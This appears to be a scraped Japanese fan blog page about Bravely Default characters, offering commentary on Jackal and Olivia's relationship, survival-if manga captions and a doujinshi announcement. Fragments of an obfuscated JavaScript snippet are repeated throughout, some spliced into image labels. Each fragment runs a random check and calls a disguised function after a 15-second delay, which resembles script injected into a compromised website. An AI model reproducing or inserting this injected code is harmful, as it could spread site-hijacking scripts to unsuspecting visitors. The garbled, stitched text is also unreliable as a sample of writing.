andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

タイトルは「オリビアちゃんの真隣」という座席の取り合いに
負けたような気分を実感したアニエスみたいなイメージです。
こんなの描いときながら、オリビアはアニエスに呼ばれたら喜んでそっちを向くとは思うんですけれど(`・ω・´)笑

「まぁナダラケス遺跡でいいでしょ危険も少ないし」みたいな
浅くはないけど深くもないノリでジャッカル達に彼女を預けたんだろうけど、
まさか小説下巻の間ずっと一緒にいるくらい仲良くなるとは誰も思ってなかったんだろうなぁ。可愛い…

andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}作品ファイル0032

このオリビアが何を思っているのか私の中であんまり決まってないです笑。
でもジャッカルが名前で呼んでる女の子がオリビアだけっていうのはたまらん可愛いなぁと思います。。

サブキャラや一部のアスタリスク所持者の生存ifこじつけ漫画です。

喋ってるのはティズイデだけど話のメインはジャカオリです。

教えてアニエス内の発言を否定する台詞がありますのでご注意ください。
また、生存ifが苦手な方は閲覧をご遠慮ください。
andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}


andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}作品ファイル0003

Read more »

andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}%e4%bd%9c%e5%93%81%e3%83%95%e3%82%a1%e3%82%a4%e3%83%ab00036

andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}%e4%bd%9c%e5%93%81%e3%83%95%e3%82%a1%e3%82%a4%e3%83%ab0039-2

andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}%e4%bd%9c%e5%93%81%e3%83%95%e3%82%a1%e3%82%a4%e3%83%ab0040

ジャッカルは自分が両親に愛されてなかったと思っていると思います。
(実際どうだったかは考察のしようがないので不明ですけれど。
 でも光の4戦士は、ジャッカルを助けるために両親はあえて彼を突き放した=ジャッカルはちゃんと両親に愛されていた。と解釈してますよね。)

だから、自分も他人への愛情の示し方とか、よく分かんなくて手探り状態なのかな、と。
そんな中で、子供達や、盗賊団のみんなにとって自分はどういう存在なんだろうって悩んでいそう。

公式アンソロでジャッカルは「アーシャの兄であり父である自分」に自信を持てなくなって、
アーシャに突き放されるのを凄く怖がってたんですが、
彼はいつもああいう恐怖と戦っていると思うんですよね。
世の中には奪われる者と奪う者しか居なくて、奪われる側に立つのが恐いんでしょうか。
それとも、単に自己否定されるのが、生い立ちが原因とかで人の何倍も恐いのかな。
いや両方である可能性ももちろんあるけれど。

けどそれは杞憂でしかなくて、みんなはジャッカルが大好き。
でも自分の愛情表現の仕方に自信が持てないので、ジャッカルはそれに気付けない。
そんなイメージがあります。

そんなジャッカルに対してオリビアちゃんは、
「えっ? そんなことを気にしていたんですか? みんなジャッカルさんが大好きなのに」って、
ほんの少し驚いた後に、ジャッカルにさり気なく優しくそれを教えてくれるんじゃないでしょうか。

新刊「ルクセンダルク学園」 ブレデフォ学パロ本/52P

Read more »